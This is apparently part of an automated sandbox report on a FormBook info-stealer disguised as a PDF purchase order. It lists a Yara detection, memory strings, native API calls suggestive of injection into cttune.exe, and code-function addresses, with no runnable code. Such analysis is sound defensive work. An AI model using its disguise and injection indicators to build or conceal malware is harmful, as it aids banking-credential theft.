Source: cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
Source: cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
Source: cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
Source: cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: cttune.exe, 0000000B.00000002.3290803746.0000000005858000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.3292279715.0000000007BE0000.00000004.00000800.00020000.00000000.sdmp, ycnUEzgloE.exe, 0000000C.00000002.3290412639.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 7.2.PO-000172483 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PO-000172483 pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3289765947.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3289827592.0000000004810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2610991232.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2611689620.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2612889550.0000000003860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA0814 NtQueryInformationProcess,	0_2_00BA0814
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA9B99 NtQueryInformationProcess,	0_2_00BA9B99
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0042CCC3 NtClose,	7_2_0042CCC3
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782B60 NtClose,LdrInitializeThunk,	7_2_01782B60
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_01782DF0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_01782C70
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017835C0 NtCreateMutant,LdrInitializeThunk,	7_2_017835C0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01784340 NtSetContextThread,	7_2_01784340
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01784650 NtSuspendThread,	7_2_01784650
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782BF0 NtAllocateVirtualMemory,	7_2_01782BF0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782BE0 NtQueryValueKey,	7_2_01782BE0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782BA0 NtEnumerateValueKey,	7_2_01782BA0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782B80 NtQueryInformationFile,	7_2_01782B80
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782AF0 NtWriteFile,	7_2_01782AF0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782AD0 NtReadFile,	7_2_01782AD0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782AB0 NtWaitForSingleObject,	7_2_01782AB0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782D30 NtUnmapViewOfSection,	7_2_01782D30
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782D10 NtMapViewOfSection,	7_2_01782D10
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782D00 NtSetInformationFile,	7_2_01782D00
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782DD0 NtDelayExecution,	7_2_01782DD0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782DB0 NtEnumerateKey,	7_2_01782DB0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782C60 NtCreateKey,	7_2_01782C60
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782C00 NtQueryInformationProcess,	7_2_01782C00
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782CF0 NtOpenProcess,	7_2_01782CF0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782CC0 NtQueryVirtualMemory,	7_2_01782CC0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782CA0 NtQueryInformationToken,	7_2_01782CA0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782F60 NtCreateProcessEx,	7_2_01782F60
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782F30 NtCreateSection,	7_2_01782F30
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782FE0 NtCreateFile,	7_2_01782FE0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782FB0 NtResumeThread,	7_2_01782FB0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782FA0 NtQuerySection,	7_2_01782FA0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782F90 NtProtectVirtualMemory,	7_2_01782F90
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782E30 NtWriteVirtualMemory,	7_2_01782E30
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782EE0 NtQueueApcThread,	7_2_01782EE0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782EA0 NtAdjustPrivilegesToken,	7_2_01782EA0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782E80 NtReadVirtualMemory,	7_2_01782E80
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01783010 NtOpenDirectoryObject,	7_2_01783010
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01783090 NtSetValueKey,	7_2_01783090
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017839B0 NtGetContextThread,	7_2_017839B0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01783D70 NtOpenThread,	7_2_01783D70
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01783D10 NtOpenProcessToken,	7_2_01783D10
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB35C0 NtCreateMutant,LdrInitializeThunk,	11_2_04AB35C0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB4650 NtSuspendThread,LdrInitializeThunk,	11_2_04AB4650
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB4340 NtSetContextThread,LdrInitializeThunk,	11_2_04AB4340
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2CA0 NtQueryInformationToken,LdrInitializeThunk,	11_2_04AB2CA0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2C60 NtCreateKey,LdrInitializeThunk,	11_2_04AB2C60
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2C70 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_04AB2C70
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2DF0 NtQuerySystemInformation,LdrInitializeThunk,	11_2_04AB2DF0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2DD0 NtDelayExecution,LdrInitializeThunk,	11_2_04AB2DD0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2D30 NtUnmapViewOfSection,LdrInitializeThunk,	11_2_04AB2D30
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2D10 NtMapViewOfSection,LdrInitializeThunk,	11_2_04AB2D10
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2E80 NtReadVirtualMemory,LdrInitializeThunk,	11_2_04AB2E80
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2EE0 NtQueueApcThread,LdrInitializeThunk,	11_2_04AB2EE0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2FB0 NtResumeThread,LdrInitializeThunk,	11_2_04AB2FB0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2FE0 NtCreateFile,LdrInitializeThunk,	11_2_04AB2FE0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2F30 NtCreateSection,LdrInitializeThunk,	11_2_04AB2F30
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB39B0 NtGetContextThread,LdrInitializeThunk,	11_2_04AB39B0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2AF0 NtWriteFile,LdrInitializeThunk,	11_2_04AB2AF0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2AD0 NtReadFile,LdrInitializeThunk,	11_2_04AB2AD0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2BA0 NtEnumerateValueKey,LdrInitializeThunk,	11_2_04AB2BA0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2BE0 NtQueryValueKey,LdrInitializeThunk,	11_2_04AB2BE0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_04AB2BF0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2B60 NtClose,LdrInitializeThunk,	11_2_04AB2B60
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB3090 NtSetValueKey,	11_2_04AB3090
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB3010 NtOpenDirectoryObject,	11_2_04AB3010
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2CF0 NtOpenProcess,	11_2_04AB2CF0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2CC0 NtQueryVirtualMemory,	11_2_04AB2CC0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2C00 NtQueryInformationProcess,	11_2_04AB2C00
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2DB0 NtEnumerateKey,	11_2_04AB2DB0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2D00 NtSetInformationFile,	11_2_04AB2D00
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB3D10 NtOpenProcessToken,	11_2_04AB3D10
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB3D70 NtOpenThread,	11_2_04AB3D70
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2EA0 NtAdjustPrivilegesToken,	11_2_04AB2EA0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2E30 NtWriteVirtualMemory,	11_2_04AB2E30
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2FA0 NtQuerySection,	11_2_04AB2FA0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2F90 NtProtectVirtualMemory,	11_2_04AB2F90
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2F60 NtCreateProcessEx,	11_2_04AB2F60
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2AB0 NtWaitForSingleObject,	11_2_04AB2AB0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04AB2B80 NtQueryInformationFile,	11_2_04AB2B80
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A99330 NtCreateFile,	11_2_00A99330
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A99490 NtReadFile,	11_2_00A99490
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A99580 NtDeleteFile,	11_2_00A99580
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A99620 NtClose,	11_2_00A99620
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_00A99770 NtAllocateVirtualMemory,	11_2_00A99770
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_04D9F903 NtResumeThread,	11_2_04D9F903

Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h			Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini			Jump to behavior

Source: C:\Windows\System32\wbem\WMIADAP.exe

File deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.h

Jump to behavior

Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA3470	0_2_00BA3470
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA1440	0_2_00BA1440
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA2591	0_2_00BA2591
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BAA6F2	0_2_00BAA6F2
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA1BB8	0_2_00BA1BB8
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA83D0	0_2_00BA83D0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BAA0B0	0_2_00BAA0B0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA3895	0_2_00BA3895
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA8CF0	0_2_00BA8CF0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA8CEC	0_2_00BA8CEC
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA08D0	0_2_00BA08D0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BAA0C0	0_2_00BAA0C0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA1416	0_2_00BA1416
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA5C78	0_2_00BA5C78
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA55A8	0_2_00BA55A8
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA5599	0_2_00BA5599
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA359C	0_2_00BA359C
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA35EA	0_2_00BA35EA
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA41D0	0_2_00BA41D0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA92F1	0_2_00BA92F1
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA5228	0_2_00BA5228
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA5A58	0_2_00BA5A58
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA5A49	0_2_00BA5A49
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA57E0	0_2_00BA57E0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA57D1	0_2_00BA57D1
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA9310	0_2_00BA9310
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_00BA3377	0_2_00BA3377
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_0251D987	0_2_0251D987
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_02511DF0	0_2_02511DF0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_025191A4	0_2_025191A4
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_0251BC10	0_2_0251BC10
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_0251BC02	0_2_0251BC02
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_02511DE0	0_2_02511DE0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_090E2860	0_2_090E2860
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_090E6C70	0_2_090E6C70
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_090E0328	0_2_090E0328
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_090E2850	0_2_090E2850
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_090EAAC8	0_2_090EAAC8
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_090EAF10	0_2_090EAF10
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_090E0032	0_2_090E0032
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_090E0040	0_2_090E0040
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_090ED0A8	0_2_090ED0A8
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_090ED0A0	0_2_090ED0A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_090E0318	0_2_090E0318
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_090EB348	0_2_090EB348
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_090EC5E8	0_2_090EC5E8
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 0_2_092912B0	0_2_092912B0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_00401C66	7_2_00401C66
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_00418D33	7_2_00418D33
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_00403045	7_2_00403045
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_00403050	7_2_00403050
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0040E8EA	7_2_0040E8EA
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0040E8F3	7_2_0040E8F3
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0040296B	7_2_0040296B
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_00402970	7_2_00402970
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_00404A47	7_2_00404A47
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0042F2B3	7_2_0042F2B3
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_00401440	7_2_00401440
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_00403420	7_2_00403420
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0041056A	7_2_0041056A
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_00410573	7_2_00410573
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_004025C6	7_2_004025C6
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_004025D0	7_2_004025D0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_00402E2E	7_2_00402E2E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_00402E30	7_2_00402E30
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_00416F1E	7_2_00416F1E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_00416F23	7_2_00416F23
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_00410793	7_2_00410793
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0040E79A	7_2_0040E79A
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0040E7A3	7_2_0040E7A3
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D8158	7_2_017D8158
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_018101AA	7_2_018101AA
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_018081CC	7_2_018081CC
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EA118	7_2_017EA118
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01740100	7_2_01740100
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E2000	7_2_017E2000
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_018103E6	7_2_018103E6
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175E3F0	7_2_0175E3F0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0180A352	7_2_0180A352
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017F0274	7_2_017F0274
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D02C0	7_2_017D02C0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01810591	7_2_01810591
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750535	7_2_01750535
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017FE4F6	7_2_017FE4F6
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01802446	7_2_01802446
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750770	7_2_01750770
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01774750	7_2_01774750
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174C7C0	7_2_0174C7C0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176C6E0	7_2_0176C6E0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01766962	7_2_01766962
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0181A9A6	7_2_0181A9A6
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017529A0	7_2_017529A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01752840	7_2_01752840
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175A840	7_2_0175A840
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177E8F0	7_2_0177E8F0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017368B8	7_2_017368B8
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01806BD7	7_2_01806BD7
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0180AB40	7_2_0180AB40
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174EA80	7_2_0174EA80
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017ECD1F	7_2_017ECD1F
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175AD00	7_2_0175AD00
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174ADE0	7_2_0174ADE0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01768DBF	7_2_01768DBF
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750C00	7_2_01750C00
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01740CF2	7_2_01740CF2
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017F0CB5	7_2_017F0CB5
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C4F40	7_2_017C4F40
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01770F30	7_2_01770F30
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01792F28	7_2_01792F28
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175CFE0	7_2_0175CFE0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01742FC8	7_2_01742FC8
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017CEFA0	7_2_017CEFA0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0180CE93	7_2_0180CE93
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750E59	7_2_01750E59
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0180EEDB	7_2_0180EEDB
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0180EE26	7_2_0180EE26
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01762E90	7_2_01762E90
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173F172	7_2_0173F172
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0178516C	7_2_0178516C
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175B1B0	7_2_0175B1B0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0181B16B	7_2_0181B16B
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0180F0E0	7_2_0180F0E0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_018070E9	7_2_018070E9
